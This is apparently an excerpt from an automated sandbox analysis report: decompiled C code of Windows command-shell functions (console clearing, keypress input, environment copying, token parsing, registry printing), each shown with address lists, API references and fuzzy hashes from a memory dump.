				void* _t50;
				void* _t52;
				signed int _t53;

				_t51 = __esi;
				_t50 = __edi;
				_t49 = __edx;
				_t42 = __ebx;
				_t19 =  *0x2cd0b4; // 0x40f69e4c
				_v8 = _t19 ^ _t53;
				if(E002B0178(_t19 ^ _t53) != 0) {
					_push(__esi);
					_t52 = GetStdHandle(0xfffffff5);
					if(GetConsoleScreenBufferInfo(_t52,  &_v32) != 0) {
						_v40.Y =  ~_v30;
						_v40.X = 0;
						_v48.Left = 0;
						_v48.Bottom = _v30;
						_v48.Right = _v32.dwSize;
						_t30 = 0x20;
						_v36.UnicodeChar = _t30;
						_v36.Attributes = _v32.wAttributes;
						ScrollConsoleScreenBufferW(_t52,  &_v48, 0, _v40,  &_v36);
						_v32.dwCursorPosition = 0;
						SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0);
					} else {
						E002B25D9(0x2a3c88);
					}
					_pop(_t51);
				} else {
					E002B25D9(0x2a3c88);
				}
				return E002B6FD0(0, _t42, _v8 ^ _t53, _t49, _t50, _t51);
			}
















                                              0x002c7ec0
                                              0x002c7ec0
                                              0x002c7ec0
                                              0x002c7ec0
                                              0x002c7ec8
                                              0x002c7ecf
                                              0x002c7edc
                                              0x002c7eee
                                              0x002c7ef7
                                              0x002c7f06
                                              0x002c7f1a
                                              0x002c7f20
                                              0x002c7f24
                                              0x002c7f2b
                                              0x002c7f35
                                              0x002c7f39
                                              0x002c7f3a
                                              0x002c7f42
                                              0x002c7f54
                                              0x002c7f5f
                                              0x002c7f69
                                              0x002c7f08
                                              0x002c7f0d
                                              0x002c7f12
                                              0x002c7f6f
                                              0x002c7ede
                                              0x002c7ee3
                                              0x002c7ee8
                                              0x002c7f7f

                                              APIs
                                                • Part of subcall function 002B0178: _get_osfhandle.MSVCRT ref: 002B0183
                                                • Part of subcall function 002B0178: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,002BD6A1), ref: 002B018D
                                              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5), ref: 002C7EF1
                                              • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?), ref: 002C7EFE
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: BufferConsoleFileHandleInfoScreenType_get_osfhandle
                                              • String ID:
                                              • API String ID: 2847887402-0
                                              • Opcode ID: 7891af9bbffb331ace2288128c89d18ca130bcb2897099ed57f5cd4df9a75b37
                                              • Instruction ID: db7e5e6b4975bd0ecc733a0bbe46ce997271331830e4cf15beaae493809d9a18
                                              • Opcode Fuzzy Hash: 7891af9bbffb331ace2288128c89d18ca130bcb2897099ed57f5cd4df9a75b37
                                              • Instruction Fuzzy Hash: BF212E3596424A9BCB00EFF4AC49AFEB7B8EF0D711F10011AF915E7650EA309A508B69
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002C3BB0, Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 63%
                                              			E002C3BB0(void* __eflags) {
				signed int _v8;
				char _v12;
				void* __ecx;
				void* _t7;
				signed short _t13;
				signed int _t14;
				void* _t15;
				void* _t22;
				void* _t23;

				_push(_t15);
				_push(_t15);
				_t23 = GetStdHandle(0xfffffff6);
				_t7 = E002AC108(_t15, 0x232b, 0, _t22);
				if(_t23 != 0) {
					if(E002B0178(_t7) == 0 || ( *0x2e3aa0 & 0x00000001) == 0) {
						E002C3B11(_t23,  &_v8, 1,  &_v12);
					} else {
						_t13 = FlushConsoleInputBuffer(_t23);
						__imp___getch();
						_t14 = _t13 & 0x0000ffff;
						_v8 = _t14;
						if(_t14 == 3) {
							EnterCriticalSection( *0x2d3858);
							 *0x2cd544 = 1;
							LeaveCriticalSection( *0x2d3858);
						}
					}
				}
				E002B25D9(L"\r\n");
				return 0;
			}












                                              0x002c3bb5
                                              0x002c3bb6
                                              0x002c3bc7
                                              0x002c3bc9
                                              0x002c3bd2
                                              0x002c3bdd
                                              0x002c3c30
                                              0x002c3be8
                                              0x002c3be9
                                              0x002c3bef
                                              0x002c3bf5
                                              0x002c3bf8
                                              0x002c3bff
                                              0x002c3c07
                                              0x002c3c13
                                              0x002c3c1d
                                              0x002c3c1d
                                              0x002c3bff
                                              0x002c3bdd
                                              0x002c3c3a
                                              0x002c3c46

                                              APIs
                                              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,002B997F,00000000,?,002CA0FC,?,?,?), ref: 002C3BBA
                                                • Part of subcall function 002B0178: _get_osfhandle.MSVCRT ref: 002B0183
                                                • Part of subcall function 002B0178: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,002BD6A1), ref: 002B018D
                                              • FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,002B997F,00000000,?,002CA0FC,?,?,?), ref: 002C3BE9
                                              • _getch.MSVCRT ref: 002C3BEF
                                              • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,002B997F,00000000,?,002CA0FC,?,?,?), ref: 002C3C07
                                              • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,002B997F,00000000,?,002CA0FC,?,?,?), ref: 002C3C1D
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: CriticalSection$BufferConsoleEnterFileFlushHandleInputLeaveType_get_osfhandle_getch
                                              • String ID:
                                              • API String ID: 491502236-0
                                              • Opcode ID: 7f8a1ad7eedb8d54b4901f4886dc77120005025fc45bada454379a2409968e19
                                              • Instruction ID: ceb1518dfd964515df95f0d3669d3dae58b90d3bbeecae2752d8474a775ea6fe
                                              • Opcode Fuzzy Hash: 7f8a1ad7eedb8d54b4901f4886dc77120005025fc45bada454379a2409968e19
                                              • Instruction Fuzzy Hash: 7501F5325642956FDB14EB60FC4DFEE7B68DB01320F50465BF806960A0DBB14FA08651
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002B3AAE, Relevance: 7.5, APIs: 5, Instructions: 32memoryCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E002B3AAE() {
				int _t9;
				void* _t12;
				WCHAR* _t13;

				_t13 = GetEnvironmentStringsW();
				_t12 = 0;
				if(_t13 != 0) {
					_t9 = E002B3B00(_t13);
					_t12 = HeapAlloc(GetProcessHeap(), 8, _t9);
					if(_t12 != 0) {
						memcpy(_t12, _t13, _t9);
					}
					FreeEnvironmentStringsW(_t13);
				}
				return _t12;
			}






                                              0x002b3ab8
                                              0x002b3aba
                                              0x002b3abe
                                              0x002b3ac8
                                              0x002b3ada
                                              0x002b3ade
                                              0x002b3ae3
                                              0x002b3ae8
                                              0x002b3aec
                                              0x002b3af2
                                              0x002b3af7

                                              APIs
                                              • GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,00000000,002B3A9F), ref: 002B3AB2
                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000000,00000000), ref: 002B3ACD
                                              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 002B3AD4
                                              • memcpy.MSVCRT ref: 002B3AE3
                                              • FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000), ref: 002B3AEC
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: EnvironmentHeapStrings$AllocFreeProcessmemcpy
                                              • String ID:
                                              • API String ID: 713576409-0
                                              • Opcode ID: 45309c4f4e3d275fe93a6b547d32eddb365955f00fdebe48ffac49a851a6f8f7
                                              • Instruction ID: 0c8e358415babc84b45b1b2f1814eb4cd578706975bb6f593212d04166a69bc9
                                              • Opcode Fuzzy Hash: 45309c4f4e3d275fe93a6b547d32eddb365955f00fdebe48ffac49a851a6f8f7
                                              • Instruction Fuzzy Hash: FBE09A73600122A7C611772A7C9CDEF6A6EEBC9BA17160016F94DCB200EE308D4689B1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002AF090, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 188COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 46%
                                              			E002AF090(intOrPtr* __ecx, intOrPtr __edx, intOrPtr* _a4, intOrPtr* _a8) {
				signed int _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t17;
				intOrPtr _t19;
				signed int _t26;
				signed int _t27;
				signed int _t28;
				intOrPtr _t37;
				signed int _t40;
				signed int _t41;
				void* _t43;
				intOrPtr _t46;
				intOrPtr* _t51;
				intOrPtr _t59;
				intOrPtr _t61;
				signed int _t62;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr* _t70;
				intOrPtr _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				intOrPtr* _t74;
				signed int _t75;
				void* _t76;
				intOrPtr _t83;

				_t66 = __edx;
				_t17 =  *0x2cd0b4; // 0x40f69e4c
				_v8 = _t17 ^ _t75;
				_t73 = _a8;
				_v12 = __edx;
				_t70 = __ecx;
				if(_t73 == E002B0210) {
					_t19 = E002B0210(__ecx, __edx);
				} else {
					if(_t73 == E002B0480) {
						_t19 = E002B0480();
					} else {
						if(_t73 == E002B0600) {
							_t19 = E002B0600();
						} else {
							if(_t73 != E002B0620) {
								 *0x2e94b4();
								_t19 =  *_t73();
							} else {
								_t19 = E002B0620();
							}
						}
					}
				}
				_t46 = _t19;
				if( *((short*)( *0x2db8a4)) == 0) {
					L21:
					return E002B6FD0(_t46, _t46, _v8 ^ _t75, _t66, _t70, _t73);
				} else {
					_t83 =  *0x2cd554; // 0x0
					if(_t83 != 0) {
					}
					_t68 = E002AF300(0x10, 0x2dfaa0, 0x2000, 0x10);
					 *0x2dfa90 = _t68;
					if(_t68 == 0xffffffff) {
						 *0x2df980 = 0x234a;
						__imp__longjmp(0x2db940, 1);
						goto L49;
					} else {
						_t62 = 0x2dfaa0;
						_t4 = _t62 + 2; // 0x2dfaa2
						_t73 = _t4;
						do {
							_t43 =  *_t62;
							_t62 = _t62 + 2;
						} while (_t43 != 0);
						_t5 = (_t62 - _t73 >> 1) + 1; // 0x2dfa9f
						 *0x2dfa8c = _t5;
						if( *0x2df984 != 0) {
							L49:
							_push(0x2dfaa0);
							_push(_t68);
							E002B25D9(L"GeToken: (%x) \'%s\'\n");
							_t76 = _t76 + 0xc;
						}
					}
					_t26 = 0x2dfaa0;
					_t51 = _t70;
					while(1) {
						_t69 =  *_t51;
						if(_t69 !=  *_t26) {
							break;
						}
						if(_t69 == 0) {
							L17:
							_t27 = 0;
						} else {
							_t6 = _t51 + 2; // 0x2b0000
							_t66 =  *_t6;
							if(_t66 !=  *((intOrPtr*)(_t26 + 2))) {
								break;
							} else {
								_t51 = _t51 + 4;
								_t26 = _t26 + 4;
								if(_t66 != 0) {
									continue;
								} else {
									goto L17;
								}
							}
						}
						L18:
						if(_t27 == 0) {
							if( *0x2dfaa0 == 0xa) {
								goto L34;
							} else {
								_t71 = _v12;
								goto L37;
							}
						} else {
							_t40 =  *0x2cd558; // 0x0
							if( *((char*)(_t40 + 0x2df987)) == 0x33) {
								_t41 = "&";
								while(1) {
									_t59 =  *_t70;
									if(_t59 !=  *_t41) {
										break;
									}
									if(_t59 == 0) {
										L30:
										_t40 = 0;
									} else {
										_t10 = _t70 + 2; // 0x2b0000
										_t61 =  *_t10;
										_t11 = _t41 + 2; // 0x2b0000
										if(_t61 !=  *_t11) {
											break;
										} else {
											_t70 = _t70 + 4;
											_t41 = _t41 + 4;
											if(_t61 != 0) {
												continue;
											} else {
												goto L30;
											}
										}
									}
									L31:
									if(_t40 != 0 ||  *0x2dfaa0 != 0xa) {
										goto L20;
									} else {
										do {
											L34:
											_t28 = E002AF030(0);
										} while ( *0x2dfaa0 == 0xa);
										_t66 = 0;
										E002AF300(_t28, 0, 0, 0);
										if( *0x2dfaa0 == 0x29) {
											goto L21;
										} else {
											_t71 = 0x2e;
											L37:
											_t74 = E002B00B0(0x50);
											if(_t74 == 0) {
												E002C9287(0x50);
												__imp__longjmp(0x2db8b8, 1);
												asm("int3");
												_push( *0x2db8a0);
												E002B25D9(L"Ungetting: \'%s\'\n");
												 *0x2db8a4 =  *0x2db8a0;
												return 0;
											} else {
												 *_t74 = _t71;
												 *((intOrPtr*)(_t74 + 0x38)) = _t46;
												 *0x2cd548 = 1;
												E002AF030(8);
												_t72 = _a4;
												 *0x2cd548 = 0;
												if(_t72 != E002AE8C0) {
													 *0x2e94b4();
													_t37 =  *_t72();
												} else {
													_t37 = E002AE8C0();
												}
												 *((intOrPtr*)(_t74 + 0x3c)) = _t37;
												return E002B6FD0(_t74, _t46, _v8 ^ _t75, _t66, _t72, _t74);
											}
										}
									}
									goto L52;
								}
								asm("sbb eax, eax");
								_t40 = _t41 | 0x00000001;
								goto L31;
							} else {
								L20:
								_t66 = 0;
								E002AF300(_t40, 0, 0, 0);
								goto L21;
							}
						}
						goto L52;
					}
					asm("sbb eax, eax");
					_t27 = _t26 | 0x00000001;
					goto L18;
				}
				L52:
			}
































                                              0x002af090
                                              0x002af098
                                              0x002af09f
                                              0x002af0a4
                                              0x002af0a7
                                              0x002af0ab
                                              0x002af0b3
                                              0x002af0e0
                                              0x002af0b5
                                              0x002af0bb
                                              0x002af1c2
                                              0x002af0c1
                                              0x002af0c7
                                              0x002af1cc
                                              0x002af0cd
                                              0x002af0d3
                                              0x002bc48d
                                              0x002bc493
                                              0x002af0d9
                                              0x002af0d9
                                              0x002af0d9
                                              0x002af0d3
                                              0x002af0c7
                                              0x002af0bb
                                              0x002af0e5
                                              0x002af0f0
                                              0x002af1ad
                                              0x002af1bf
                                              0x002af0f6
                                              0x002af0f8
                                              0x002af0fe
                                              0x002af1d6
                                              0x002af114
                                              0x002af116
                                              0x002af11f
                                              0x002bc4a1
                                              0x002bc4ab
                                              0x00000000
                                              0x002af125
                                              0x002af125
                                              0x002af12a
                                              0x002af12a
                                              0x002af130
                                              0x002af130
                                              0x002af133
                                              0x002af136
                                              0x002af146
                                              0x002af149
                                              0x002af14e
                                              0x002bc4b1
                                              0x002bc4b1
                                              0x002bc4b6
                                              0x002bc4bc
                                              0x002bc4c1
                                              0x002bc4c1
                                              0x002af14e
                                              0x002af154
                                              0x002af159
                                              0x002af160
                                              0x002af160
                                              0x002af166
                                              0x00000000
                                              0x00000000
                                              0x002af16f
                                              0x002af18a
                                              0x002af18a
                                              0x002af171
                                              0x002af171
                                              0x002af171
                                              0x002af179
                                              0x00000000
                                              0x002af17f
                                              0x002af17f
                                              0x002af182
                                              0x002af188
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002af188
                                              0x002af179
                                              0x002af18c
                                              0x002af18e
                                              0x002af2da
                                              0x00000000
                                              0x002af2e0
                                              0x002af2e0
                                              0x00000000
                                              0x002af2e0
                                              0x002af194
                                              0x002af194
                                              0x002af1a0
                                              0x002af1e0
                                              0x002af1f0
                                              0x002af1f0
                                              0x002af1f6
                                              0x00000000
                                              0x00000000
                                              0x002af1ff
                                              0x002af21a
                                              0x002af21a
                                              0x002af201
                                              0x002af201
                                              0x002af201
                                              0x002af205
                                              0x002af209
                                              0x00000000
                                              0x002af20f
                                              0x002af20f
                                              0x002af212
                                              0x002af218
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002af218
                                              0x002af209
                                              0x002af21c
                                              0x002af21e
                                              0x00000000
                                              0x002af230
                                              0x002af230
                                              0x002af230
                                              0x002af232
                                              0x002af237
                                              0x002af243
                                              0x002af247
                                              0x002af254
                                              0x00000000
                                              0x002af25a
                                              0x002af25a
                                              0x002af25f
                                              0x002af269
                                              0x002af26d
                                              0x002bc4c9
                                              0x002bc4d5
                                              0x002bc4db
                                              0x002bc4dc
                                              0x002bc4e7
                                              0x002af43d
                                              0x002af44a
                                              0x002af273
                                              0x002af278
                                              0x002af27a
                                              0x002af27d
                                              0x002af287
                                              0x002af28c
                                              0x002af28f
                                              0x002af29f
                                              0x002af2ea
                                              0x002af2f0
                                              0x002af2a1
                                              0x002af2a1
                                              0x002af2a1
                                              0x002af2a9
                                              0x002af2bb
                                              0x002af2bb
                                              0x002af26d
                                              0x002af254
                                              0x00000000
                                              0x002af21e
                                              0x002af2c8
                                              0x002af2ca
                                              0x00000000
                                              0x002af1a2
                                              0x002af1a2
                                              0x002af1a4
                                              0x002af1a8
                                              0x00000000
                                              0x002af1a8
                                              0x002af1a0
                                              0x00000000
                                              0x002af18e
                                              0x002af2be
                                              0x002af2c0
                                              0x00000000
                                              0x002af2c0
                                              0x00000000

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID:
                                              • String ID: GeToken: (%x) '%s'$Ungetting: '%s'
                                              • API String ID: 0-1704545398
                                              • Opcode ID: a4d3d675b38b16caae51b732637323af3514b568678eaf21ef913c45f8769926
                                              • Instruction ID: 533b2dcb8d86113d7378a350ba819042822268a0efaa177f55896646013a5df8
                                              • Opcode Fuzzy Hash: a4d3d675b38b16caae51b732637323af3514b568678eaf21ef913c45f8769926
                                              • Instruction Fuzzy Hash: 9E513B31A30206DBDBA4AFE4DA593BA7361EB92340F54403BD80B87291EFB98C75C751
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002C4B4E, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 139registryCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 76%
                                              			E002C4B4E(void* __ecx, signed int __edx) {
				signed int _v8;
				short _v528;
				void* _v532;
				int _v536;
				int _v540;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t19;
				void* _t24;
				signed int _t26;
				signed int _t31;
				void* _t39;
				void* _t42;
				int _t43;
				signed int _t53;
				signed int _t54;
				int _t59;
				void* _t64;
				int* _t66;
				void* _t67;
				void* _t69;
				signed int _t70;
				void* _t71;
				void* _t80;

				_t63 = __edx;
				_t19 =  *0x2cd0b4; // 0x40f69e4c
				_v8 = _t19 ^ _t70;
				_t67 = __ecx;
				_v532 = __ecx;
				if(__edx != 0) {
					_t43 = E002ADF40(E002ADEF9(__edx));
					__eflags = _t43;
					if(_t43 == 0) {
						L14:
						_t24 = 1;
						L28:
						__eflags = _v8 ^ _t70;
						return E002B6FD0(_t24, _t43, _v8 ^ _t70, _t63, _t66, _t67);
					}
					_t64 = 0x20;
					_t26 = E002B2349(_t43, _t64);
					__eflags = _t26;
					if(__eflags != 0) {
						__eflags = 0;
						 *_t26 = 0;
					}
					_t50 = _t67;
					_t63 = E002C5662(_t43, _t67, _t43, _t66, _t67, __eflags);
					_v532 = _t63;
					__eflags = _t63;
					if(_t63 == 0) {
						L25:
						_t67 = 1;
						__eflags = 1;
						E002AC5A2(_t50, 0x400023a3, 1, _t43);
						goto L26;
					} else {
						_t53 = _t63;
						_t66 = 0;
						__eflags = 0;
						_t16 = _t53 + 2; // 0x2
						_t69 = _t16;
						do {
							_t31 =  *_t53;
							_t53 = _t53 + 2;
							__eflags = _t31;
						} while (_t31 != 0);
						_t54 = _t53 - _t69;
						__eflags = _t54;
						_t50 = _t54 >> 1;
						if(_t54 == 0) {
							goto L25;
						}
						_push(_t63);
						_push(_t43);
						_t67 = E002B25D9(L"%s=%s\r\n");
						L26:
						E002B0040(_v532);
						E002B0040(_t43);
						L27:
						_t24 = _t67;
						goto L28;
					}
				}
				_t66 = 0;
				_t43 = 0;
				_v536 = 0;
				while(1) {
					_v540 = 0x104;
					_t67 = RegEnumKeyExW(_t67, _t43,  &_v528,  &_v540, _t66, _t66, _t66, _t66);
					if(_t67 != 0) {
						break;
					}
					_t76 = _v528 - 0x2e;
					if(_v528 != 0x2e) {
						L10:
						_t80 =  *0x2cd544 - _t66; // 0x0
						if(_t80 != 0) {
							goto L14;
						}
						_t43 = _t43 + 1;
						_v536 = _t43;
						if(_t67 != 0) {
							goto L27;
						}
						_t67 = _v532;
						continue;
					}
					_t56 = _v532;
					_t63 =  &_v528;
					_t43 = E002C5662(_t43, _v532,  &_v528, _t66, _t67, _t76);
					if(_t43 == 0) {
						_push(_t66);
						_push(GetLastError());
						E002AC5A2(_t56);
						goto L14;
					}
					_t59 = _t43;
					_t10 = _t59 + 2; // 0x2
					_t63 = _t10;
					do {
						_t39 =  *_t59;
						_t59 = _t59 + 2;
					} while (_t39 != _t66);
					if(_t59 != _t63) {
						_push(_t43);
						_push( &_v528);
						_t42 = E002B25D9(L"%s=%s\r\n");
						_t71 = _t71 + 0xc;
						_t67 = _t42;
					}
					E002B0040(_t43);
					_t43 = _v536;
					goto L10;
				}
				__eflags = _t67 - 0x103;
				if(_t67 == 0x103) {
					_t67 = _t66;
				}
				goto L27;
			}





























                                              0x002c4b4e
                                              0x002c4b59
                                              0x002c4b60
                                              0x002c4b65
                                              0x002c4b67
                                              0x002c4b70
                                              0x002c4c63
                                              0x002c4c65
                                              0x002c4c67
                                              0x002c4c3a
                                              0x002c4c3c
                                              0x002c4cdf
                                              0x002c4ce4
                                              0x002c4cef
                                              0x002c4cef
                                              0x002c4c6b
                                              0x002c4c6e
                                              0x002c4c73
                                              0x002c4c75
                                              0x002c4c77
                                              0x002c4c79
                                              0x002c4c79
                                              0x002c4c7e
                                              0x002c4c85
                                              0x002c4c87
                                              0x002c4c8d
                                              0x002c4c8f
                                              0x002c4cb9
                                              0x002c4cbc
                                              0x002c4cbc
                                              0x002c4cc3
                                              0x00000000
                                              0x002c4c91
                                              0x002c4c91
                                              0x002c4c93
                                              0x002c4c93
                                              0x002c4c95
                                              0x002c4c95
                                              0x002c4c98
                                              0x002c4c98
                                              0x002c4c9b
                                              0x002c4c9e
                                              0x002c4c9e
                                              0x002c4ca3
                                              0x002c4ca3
                                              0x002c4ca5
                                              0x002c4ca7
                                              0x00000000
                                              0x00000000
                                              0x002c4ca9
                                              0x002c4caa
                                              0x002c4cb5
                                              0x002c4cc8
                                              0x002c4cd1
                                              0x002c4cd8
                                              0x002c4cdd
                                              0x002c4cdd
                                              0x00000000
                                              0x002c4cdd
                                              0x002c4c8f
                                              0x002c4b76
                                              0x002c4b78
                                              0x002c4b7a
                                              0x002c4b80
                                              0x002c4b8a
                                              0x002c4ba4
                                              0x002c4ba8
                                              0x00000000
                                              0x00000000
                                              0x002c4bae
                                              0x002c4bb6
                                              0x002c4c09
                                              0x002c4c09
                                              0x002c4c0f
                                              0x00000000
                                              0x00000000
                                              0x002c4c11
                                              0x002c4c12
                                              0x002c4c1a
                                              0x00000000
                                              0x00000000
                                              0x002c4c20
                                              0x00000000
                                              0x002c4c20
                                              0x002c4bb8
                                              0x002c4bbe
                                              0x002c4bc9
                                              0x002c4bcd
                                              0x002c4c2b
                                              0x002c4c32
                                              0x002c4c33
                                              0x00000000
                                              0x002c4c39
                                              0x002c4bcf
                                              0x002c4bd1
                                              0x002c4bd1
                                              0x002c4bd4
                                              0x002c4bd4
                                              0x002c4bd7
                                              0x002c4bda
                                              0x002c4be3
                                              0x002c4be5
                                              0x002c4bec
                                              0x002c4bf2
                                              0x002c4bf7
                                              0x002c4bfa
                                              0x002c4bfa
                                              0x002c4bfe
                                              0x002c4c03
                                              0x00000000
                                              0x002c4c03
                                              0x002c4c42
                                              0x002c4c48
                                              0x002c4c4e
                                              0x002c4c4e
                                              0x00000000

                                              APIs
                                              • RegEnumKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 002C4B9E
                                              • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 002C4C2C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: EnumErrorLast
                                              • String ID: %s=%s$.
                                              • API String ID: 1967352920-4275322459
                                              • Opcode ID: 7d3aa9b288e2d7398573cf2a5aded8b8928607c28592aca2f58af2dd7f9b4212
                                              • Instruction ID: aed782915ffe9ded362b9b60760e7d58e2305b1621ae56fb8905b1252d78c1de
                                              • Opcode Fuzzy Hash: 7d3aa9b288e2d7398573cf2a5aded8b8928607c28592aca2f58af2dd7f9b4212
                                              • Instruction Fuzzy Hash: A6414C71E2021A97CB34BF655CA5FFF7369EB90350F1442AEE80B97251DE709E608A90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002A6663, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 119COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 36%
                                              			E002A6663(void* __eflags, char _a4, signed short* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				char _v12;
				char _v28;
				wchar_t* _t43;
				intOrPtr* _t45;
				intOrPtr* _t48;
				long _t54;
				void* _t72;
				signed short* _t79;

				E002A9794( &_a8);
				asm("movsd");
				_t87 =  *_a8;
				asm("movsd");
				asm("movsd");
				if( *_a8 == 0) {
					_a16 = 0x400023cd;
					L8:
					L11:
					_t29 =  &_a4; // 0x2a6377
					asm("movsd");
					asm("movsd");
					asm("movsd");
					return  *_t29;
				}
				_t6 =  &_v12; // 0x2a6377
				if(E002A6785( &_a8, _t6, _t87,  &_v8) == 0) {
					L9:
					_push( &_v28);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					E002A61D4();
					L10:
					goto L11;
				}
				E002A9794( &_a8);
				_t79 = _a8;
				_t54 =  *_t79 & 0x0000ffff;
				if(_t54 == 0) {
					goto L9;
				}
				_t72 = 0x3d;
				if(_t54 != _t72) {
					_t43 = wcschr(L"<>+-*/%()|^&=,", _t54);
					__eflags = _t43;
					if(_t43 == 0) {
						goto L9;
					}
					_a8 =  &(_t79[1]);
					__eflags = _t54 - 0x3c;
					if(_t54 == 0x3c) {
						L17:
						E002A9794( &_a8);
						_t45 = _a8;
						__eflags =  *_t45 - _t54;
						if( *_t45 != _t54) {
							goto L9;
						}
						_a8 = _t45 + 2;
						goto L4;
					}
					__eflags = _t54 - 0x3e;
					if(_t54 != 0x3e) {
						goto L4;
					}
					goto L17;
				}
				L4:
				E002A9794( &_a8);
				_t48 = _a8;
				_t91 =  *_t48 - _t72;
				if( *_t48 != _t72) {
					goto L9;
				}
				_a8 = _t48 + 2;
				_push( &_v28);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				E002A6663(_t91);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t92 = _a16;
				if(_a16 != 0) {
					goto L10;
				}
				E002A613F( &_a8, _t54, E002A60DE(_v8, _t92), _a12);
				_t93 = _a16;
				if(_a16 == 0) {
					_t24 =  &_v12; // 0x2a6377
					_a16 = E002A682C( *_t24, _v8, _t93, _a12);
				}
				goto L8;
			}












                                              0x002a6671
                                              0x002a667f
                                              0x002a6680
                                              0x002a6684
                                              0x002a6685
                                              0x002a6686
                                              0x002bace0
                                              0x002a672a
                                              0x002a6745
                                              0x002a6745
                                              0x002a674a
                                              0x002a674b
                                              0x002a674c
                                              0x002a6753
                                              0x002a6753
                                              0x002a6690
                                              0x002a669d
                                              0x002a672f
                                              0x002a673a
                                              0x002a673b
                                              0x002a673c
                                              0x002a673d
                                              0x002a673e
                                              0x002a6743
                                              0x00000000
                                              0x002a6743
                                              0x002a66a6
                                              0x002a66ab
                                              0x002a66ae
                                              0x002a66b4
                                              0x00000000
                                              0x00000000
                                              0x002a66b8
                                              0x002a66bc
                                              0x002a675c
                                              0x002a6764
                                              0x002a6766
                                              0x00000000
                                              0x00000000
                                              0x002a676b
                                              0x002a676e
                                              0x002a6771
                                              0x002bacec
                                              0x002bacef
                                              0x002bacf4
                                              0x002bacf7
                                              0x002bacfa
                                              0x00000000
                                              0x00000000
                                              0x002bad03
                                              0x00000000
                                              0x002bad03
                                              0x002a6777
                                              0x002a677a
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002a6780
                                              0x002a66c2
                                              0x002a66c5
                                              0x002a66ca
                                              0x002a66cd
                                              0x002a66d0
                                              0x00000000
                                              0x00000000
                                              0x002a66dd
                                              0x002a66e3
                                              0x002a66e4
                                              0x002a66e5
                                              0x002a66e6
                                              0x002a66e7
                                              0x002a66f1
                                              0x002a66f2
                                              0x002a66f3
                                              0x002a66f4
                                              0x002a66f8
                                              0x00000000
                                              0x00000000
                                              0x002a670e
